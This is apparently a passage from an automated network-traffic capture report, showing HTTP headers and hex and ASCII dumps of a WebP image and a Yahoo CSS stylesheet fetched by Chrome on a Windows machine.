                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=1;cpu=0;start=2024-09-17T17:01:25.324Z;desc=hit,rtt;dur=93,content-info;desc="width=536,height=284,bytes=9346,owidth=900,oheight=505,obytes=46729,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 1124371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 52 49 46 46 7a 24 00 00 57 45 42 50 56 50 38 20 6e 24 00 00 30 ef 00 9d 01 2a 18 02 1c 01 3e 79 3a 99 49 24 a3 25 a4 24 f1 6b 00 b0 0f 09 65 1d fe 86 dc a9 42 a4 d3 1f fe cd 1e 86 45 95 a8 21 0b 85 82 ac 6d b9 80 10 e4 fc e5 36 23 3f f5 d0 48 54 bc 1a 2d 6e af 04 41 af 97 35 64 a2 ab cb 27 b2 cb 45 54 6b 53 7d b0 d4 59 8f a2 67 41 df 1a ba 24 8a 5c f9 c9 f8 a8 fa 3d 17 97 49 33 1b 3a 4c b4 34 cc 38 ca 9e 75 3f e6 4e 51 a8 fc 64 dc ce ac a4 ef fe 7f 9f 21 fa 54 58 d0 30 e8 d2 7c 48 8b cf 88 08 55 55 55 47 50 37 34 27 aa cb fe 3a a9 d4 0f e1 fa de b5 23 da c8 bc 8c 58 ed 88 90 77 72 77 5a 54 2b 66 03 74 72 7c 42 5d 8c 94 ed 22 8b 74 da 71 3e e9 07 0d 7c 77 22 61 30 f2 67 0d 52 ab 8b 72 80 e6 b0 bc 16 91 b9 cd e7 32 03 fc 11 a0 72 0f d3 e4 c9 93 0e 8a ec 0d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: RIFFz$WEBPVP8 n$0*>y:I$%$keBE!m6#?HT-nA5d'ETkS}YgA$\=I3:L48u?NQd!TX0|HUUUGP74':#XwrwZT+ftr|B]"tq>|w"a0gRr2r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 88 9c cc cc 33 c7 c9 e5 22 f4 f8 ff 53 cf 74 e4 16 96 2b 72 34 d8 5d e9 fd 1c 20 c6 da 42 ac 5c 94 3a 59 51 9d 11 3c ee 23 fc 10 3b c3 69 7d 42 8f ea 97 c5 fc cf e2 00 c9 07 25 03 16 1c ad e2 89 75 75 00 6c ae 8c 74 72 5d 3c 96 dd ed c6 84 49 ce db e9 3b fc f1 9a 67 ff 37 fe 74 7c d4 82 78 ed 66 7f 66 12 51 bf 00 a9 f6 3f 35 10 a1 a5 a5 3e 7d 02 57 21 f3 e6 d3 12 b6 e7 80 63 b8 89 a6 bb 35 63 10 20 b9 3f d2 83 26 31 cc 3a 8c fb 77 92 1c c5 31 f0 14 b7 8b d1 c1 79 4f ff b7 52 a6 16 04 d8 0d a5 80 de 46 52 b8 34 5e cd 5c a4 d1 bc c7 b0 8c 10 77 6e e6 ef f5 ce 4f c2 9b 11 50 0b a3 aa 6b 4e f2 91 61 1d 0a 8c cc 16 ed c0 f8 a9 3c 1b 15 02 23 ca fc 7a 0e cf a7 a9 8d 71 2b 72 f3 1c 58 b7 d5 5c 73 e7 0c fc a9 71 00 ae c0 09 45 d4 bc 4b 22 e8 bb 2f 19 4c 27 2c 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3"St+r4] B\:YQ<#;i}B%uultr]<I;g7t|xffQ?5>}W!c5c ?&1:w1yORFR4^\wnOPkNa<#zq+rX\sqEK"/L',
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: df 62 15 47 db a4 2d 97 71 c9 68 f1 24 4b 2d 25 9a 8a d8 ed 5d 7a 9b 6c fa 4c f8 11 7b 13 01 95 f0 38 2d a9 04 fa 4b cc 1f 76 98 0f 14 f2 ac 9d b7 e0 d0 82 9d a9 a2 ce 5d ff f2 67 d0 93 eb 65 fe 23 aa 20 6a 6f 0f c4 cb 74 52 e3 54 d5 aa 58 95 46 94 6d ae 58 e3 f3 e8 97 66 32 1b 77 f7 f1 3d 8a 03 77 47 14 78 03 d9 c1 4c 0e e6 e2 03 77 f2 21 cb 2d 05 ab 14 04 d4 59 4d 32 a7 73 2f fd e6 90 56 64 c5 64 2f b3 7b 06 bf 8a 09 e2 4b 15 3d 46 dd a2 f7 08 17 67 ee a9 b7 eb 67 84 9d f9 5b 0f b2 4b c7 9c e6 be 6d 2a bd 31 b8 15 43 2b 75 eb 78 0d 9c 63 1e 00 a0 75 f8 f7 2f d2 15 44 27 5b 00 6b 97 7d a9 94 49 29 18 20 48 ce 03 fe 38 e3 50 d3 ad e3 1a 02 8b 9b 61 3b 1a ca 50 c9 dc b5 fe 38 a9 39 84 cb 6b c2 0a d3 0b 9b 35 86 41 38 28 05 9a ad 9e 02 9e 11 b9 c1 f9 5c 1d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: bG-qh$K-%]zlL{8-Kv]ge# jotRTXFmXf2w=wGxLw!-YM2s/Vdd/{K=Fgg[Km*1C+uxcu/D'[k}I) H8Pa;P89k5A8(\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 5f 31 d5 de c8 44 99 84 92 99 fe 3f f4 83 0b 2c c2 2c 38 23 8b 0d 26 66 62 ea 58 3b ca 73 ae 1b 43 27 0c 62 9a c8 97 34 69 e5 9f 8b e5 ef 8b 53 81 2a 06 52 c6 9a 13 af 93 2f f0 eb a1 31 1f 48 b8 3d 83 49 f6 21 5d 5d 76 bd c6 10 a9 56 de a4 e0 93 10 e7 85 3e 24 b8 bf 0d e8 37 a7 60 dd 7c eb f5 64 18 61 39 66 55 15 9c fe 05 72 36 ee 5e 4d 48 a0 58 11 c2 36 3a 89 6c 3d 1c 69 6e 2b d2 26 1f 15 37 0b 0b cf 19 82 a7 1f 68 bb 01 6b a2 25 61 cd e3 48 06 ee bf b5 f4 35 48 91 05 b7 61 8a 05 1b 00 14 4b e7 8f bb f9 50 42 a4 d8 e1 14 db 05 ef f9 79 e9 08 c6 2d 39 27 64 51 ee 22 45 fe e1 99 59 11 42 25 9c ba d5 fa fa 1a 99 fc 7c 3f cd 3b 04 74 df 1d 52 29 ad 01 cc 2e 1c d3 ea ff d9 f7 26 1d d4 69 5e b5 d5 26 bf 89 87 3c f4 75 7d f4 0b 64 d2 f1 dd c7 fd 67 04 89 88 0c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: _1D?,,8#&fbX;sC'b4iS*R/1H=I!]]vV>$7`|da9fUr6^MHX6:l=in+&7hk%aH5HaKPBy-9'dQ"EYB%|?;tR).&i^&<u}dg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: b4 74 68 51 c8 e8 be 30 1e 55 23 1b ef bf 9b 52 a1 f3 a4 b1 e4 dd 01 99 eb ea b7 f8 e1 de e0 e7 73 1a 30 a1 fd 2a 00 dc af 33 56 b9 9a b4 41 10 df c1 a8 ca 42 64 2e b2 81 53 c5 59 e9 c6 a0 e8 0f b8 48 d5 05 bc bc d9 45 fe a0 79 f9 ed 16 67 60 66 1a a3 46 7c 73 eb 0e 3a d2 1e 77 98 91 dd 72 c2 76 fe 31 fe e7 ce 7c 4e e7 da 91 1f 29 65 47 13 8d 68 3f 5b 20 32 b1 da 7d 7f 11 3b 72 3d 9b 08 76 4e 99 06 2e 02 e1 55 1b 46 8a 27 03 33 67 38 96 51 f4 bb ed 24 d8 1c e2 76 b8 c0 e7 51 e0 bd 2e 4b 3d 0f f8 0b 8d 8a b1 47 a8 8d 17 b1 b9 83 eb 42 9a 64 2e 09 1f c5 f5 00 6f 61 35 22 db 57 54 02 5f af 41 8c 76 cb 92 70 ce 14 28 29 15 ce 19 24 27 da 4a 70 f0 23 6c 42 16 bf aa 4b 50 e4 42 bf 65 d4 95 8d 59 d3 79 34 11 6d 0d 75 7a 90 00 a7 ea 69 c9 a7 b5 45 55 f1 5a 75 da
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: thQ0U#Rs0*3VABd.SYHEyg`fF|s:wrv1|N)eGh?[ 2};r=vN.UF'3g8Q$vQ.K=GBd.oa5"WT_Avp()$'Jp#lBKPBeYy4muziEUZu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 86 45 ff 49 17 27 b1 f6 e5 4c f8 d6 08 98 d3 37 45 60 c8 da bb 8c 5e 75 71 28 9e ae ea a8 62 7a d7 60 c8 de d7 a8 d5 b3 ea c1 a0 b3 f6 a5 87 73 d7 b0 61 02 d0 97 54 cd 1e 49 cd 3e 79 a6 59 e2 f2 2a 6b 94 9c 00 e1 98 9d 3e 0b ca 07 f5 2e ff 8e 7d 25 73 84 e1 75 ea 8a 63 19 d3 3f 6f e2 99 85 8c 4a 3f 63 49 93 98 51 00 a5 6a 25 7d ce 38 a3 d3 4f 45 fb 17 b6 4a 68 78 f5 39 fb e3 44 d1 17 30 21 d0 c2 13 68 3c 0d 71 77 48 af ad 71 02 4e 46 09 aa 32 a7 3f a8 46 8d 27 48 76 81 f7 eb 6a af e1 31 36 61 5b 93 45 eb ae a2 f7 2a 0f cb 7e b7 30 b6 dd 53 22 ef e0 7e 75 ba 66 e3 28 d2 46 d3 8f 78 25 38 68 dd 52 44 7b 86 69 5f c6 f5 5e 23 64 a2 9f 3e 02 4e 37 aa 40 58 82 bf 94 cb 4e be 0b 2b ca 8f 8b bc 74 bf ff 99 3a 6e e7 3b b9 85 31 37 66 c4 e4 4d 3c 87 81 16 59 11 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: EI'L7E`^uq(bz`saTI>yY*k>.}%suc?oJ?cIQj%}8OEJhx9D0!h<qwHqNF2?F'Hvj16a[E*~0S"~uf(Fx%8hRD{i_^#d>N7@XN+t:n;17fM<Y=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: b3 9a 84 0c 17 23 e4 4b 04 c5 4b 2d e4 94 b3 78 23 fb 24 43 5b 93 99 56 c4 8c e1 d4 c7 a2 07 5f 44 ce 08 ba 79 59 d8 47 fe fb 35 d2 ee 20 b2 05 1d 82 e8 01 a4 04 12 15 f6 bd 02 23 2b ec 0c a8 cd 8f de ad 55 7e 01 26 e5 0e e5 fe ff bb a9 3b 9d c4 75 6d 07 5f e0 ed 03 dc 39 7e f5 97 7d fc 4b 18 bd 33 3f 66 f6 0a 70 ad 1e 53 65 9a 6b 08 d6 b4 ac 84 20 e4 12 18 da 5a ca c1 53 93 ca b0 eb 4b 13 0f d8 68 0f 9e 7a 1f bd 29 cf 8f f1 45 bb 5e 5e 09 3d c5 03 4b 47 85 89 da 1e 01 e7 1b 4b cb df 6c 55 9c d8 2f cb 1c 28 ef 2c c8 f7 71 e8 bc 37 b1 e2 0b 84 1c 5c 13 d5 cd 5b da 88 6b 7a 00 8b 8f 2d 1d a5 95 5f 23 82 f4 90 20 f3 18 2d b1 87 b1 68 45 c8 15 f2 bc a9 98 ab 62 67 ae 18 57 97 38 96 f8 79 d1 aa 45 80 d7 ea 01 49 b6 a4 98 bc e6 3c 69 87 d8 51 05 00 5a 19 43 89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: #KK-x#$C[V_DyYG5 #+U~&;um_9~}K3?fpSek ZSKhz)E^^=KGKlU/(,q7\[kz-_# -hEbgW8yEI<iQZC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC246INData Raw: b1 56 89 26 65 20 c5 40 de 9f 25 68 f4 da 50 38 6d 24 95 a3 2b 22 25 97 e4 fe 72 26 ee 90 1e e3 ec 96 cf b0 19 4d 6c 96 b9 0e 69 7c 5e b3 f6 43 37 b7 08 0b e5 bb f4 04 50 8c 35 94 72 c8 0d 0a 94 cc 4d c4 d3 23 45 9d 0e 51 0f 7a be aa 01 4e c0 c1 70 4f 5c 86 f3 e5 02 10 3d 64 e4 50 a7 e4 f9 b3 35 50 21 86 36 9f 13 ae a7 65 22 f0 70 20 39 c5 62 a3 21 17 4f c2 83 e8 f9 29 a8 b9 97 18 e3 52 34 e5 09 17 6c bd 71 b2 ff 92 6d 91 e9 b3 24 99 1a f5 55 1a 20 07 53 db cc f8 c5 a8 2a 61 57 08 5f 83 b9 c2 45 86 b4 9b 5f 83 a2 87 f8 5a 58 eb 56 14 e2 df ff 4b 84 8c e0 e7 e4 c0 4d d8 d0 88 f9 69 58 a7 16 84 5c fe a3 37 a7 14 98 fc 54 f6 2e 94 45 14 67 b0 71 60 b3 a4 61 45 f5 97 9a e4 46 cc d8 14 42 33 23 8b b2 fc e1 82 bc fa 1a 93 a1 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: V&e @%hP8m$+"%r&Mli|^C7P5rM#EQzNpO\=dP5P!6e"p 9b!O)R4lqm$U S*aW_E_ZXVKMiX\7T.Egq`aEFB3#


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    43192.168.2.44980287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC599OUTGET /pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: +6+sEn051l2Wvqo3jnXI2q/BMSA92rSD/1IqoqUzvDyWIHR8/LIuTKYKZlNm5ugFSQgboec1b3c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: VK72NBWM6G2R4EXA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sat, 28 Sep 2024 12:16:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 12 Jun 2024 01:40:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "e1026852c4e85d7df641ed51990b2993"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 9985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 191057
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 42 64 5c 28 6e 5c 29 2c 2e 42 64 5c 28 6e 5c 29 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 5c 24 73 72 63 68 46 75 6a 69 44 69 72 74 79 53 65 61 67 75 6c 6c 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 2c 23 65 30 65 34 65 39 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 74 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 5c 23 30 30 35 37 62 38 5c 29 5c 3a 5c 3a 62 3a 3a 62 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: #atomic .Ai\(c\){align-items:center}#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(\$srchFujiDirtySeagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull,#e0e4e9)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdendc\(\#0057b8\)\:\:b::be
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 31 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 5c 28 32 70 78 5c 29 5c 3a 5c 3a 62 3a 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 5c 28 33 30 70 78 5c 29 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 62 65 6e 64 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 62 73 74 61 72 74 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {border-left-width:112px}#atomic .Bdrs\(2px\)\:\:b::before{border-radius:2px}#atomic .Bdrs\(30px\){border-radius:30px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bdrsbend\(8px\){border-bottom-right-radius:8px}#atomic .Bdrsbstart\(8px\){border-bottom-l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 2e 63 6f 6d 2f 70 76 2f 73 74 61 74 69 63 2f 69 6d 67 2f 66 69 72 65 49 63 6f 6e 46 69 6e 61 6c 5f 5f 61 6c 70 68 61 5f 62 67 2d 32 30 32 33 31 31 30 31 30 33 33 31 2e 67 69 66 27 29 29 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 42 67 63 5c 28 5c 24 73 72 63 68 46 75 6a 69 57 68 69 74 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 2c 23 66 66 66 29 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 37 65 31 66 66 66 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 65 31 66 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 73 72 63 68 46 75 6a 69 57 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .com/pv/static/img/fireIconFinal__alpha_bg-202311010331.gif'))}.active .active_Bgc\(\$srchFujiWhite\){background-color:#fff!important;background-color:var(--white,#fff)!important}#atomic .Bgc\(\#7e1fff\){background-color:#7e1fff}#atomic .Bgc\(\$srchFujiWh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 24 73 72 63 68 46 75 6a 69 42 61 74 63 61 76 65 5c 29 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 2c 23 32 33 32 61 33 31 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 73 72 63 68 46 75 6a 69 42 61 74 74 6c 65 73 68 69 70 5c 29 7b 63 6f 6c 6f 72 3a 23 35 62 36 33 36 61 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 74 6c 65 73 68 69 70 2c 23 35 62 36 33 36 61 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 73 72 63 68 46 75 6a 69 43 68 61 72 63 6f 61 6c 5c 29 7b 63 6f 6c 6f 72 3a 23 34 36 34 65 35 36 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 68 61 72 63 6f 61 6c 2c 23 34 36 34 65 35 36 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 73 72 63 68 46 75 6a 69 44 6f 6c 70 68 69 6e 5c 29 7b 63 6f 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: $srchFujiBatcave\){color:#232a31;color:var(--batcave,#232a31)}#atomic .C\(\$srchFujiBattleship\){color:#5b636a;color:var(--battleship,#5b636a)}#atomic .C\(\$srchFujiCharcoal\){color:#464e56;color:var(--charcoal,#464e56)}#atomic .C\(\$srchFujiDolphin\){col
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 62 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 30 5c 2e 36 38 37 35 72 65 6d 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 36 38 37 35 72 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 30 5c 2e 38 37 35 72 65 6d 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 32 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 36 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 38 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 23 61 74 6f 6d 69 63 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 00\){font-weight:700}#atomic .Fw\(b\){font-weight:700}#atomic .Fz\(0\.6875rem\){font-size:.6875rem}#atomic .Fz\(0\.875rem\){font-size:.875rem}#atomic .Fz\(12px\){font-size:12px}#atomic .Fz\(16px\){font-size:16px}#atomic .Fz\(18px\){font-size:18px}#atomic
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 30 5c 29 5c 3a 66 6f 74 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 31 36 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 34 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 38 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 39 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 68 5c 28 32 32 70 78 5c 29 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 70 78 7d 2e 66 6c 61 6d 65 54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: atomic .Mstart\(0\)\:fot:first-of-type{margin-left:0}#atomic .Mstart\(16px\){margin-left:16px}#atomic .Mstart\(4px\){margin-left:4px}#atomic .Mstart\(8px\){margin-left:8px}#atomic .Mstart\(9px\){margin-left:9px}#atomic .Mah\(22px\){max-height:22px}.flameT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 37 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 37 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 37 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 31 31 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 20 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 5f 50 74 5c 28 31 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 20 2e 77 61 66 65 72 2d 74 61 62 73 2d 74 61 72 67 65 74 5f 50 74 5c 28 38 70 78 5c 29 7b 70 61 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ){padding-top:7px}#atomic .Py\(7px\){padding-bottom:7px}#atomic .Pt\(11px\){padding-top:11px}#atomic .Pt\(2px\){padding-top:2px}.wafer-tabs-target .wafer-tabs-target_Pt\(12px\){padding-top:12px!important}.wafer-tabs-target .wafer-tabs-target_Pt\(8px\){pad
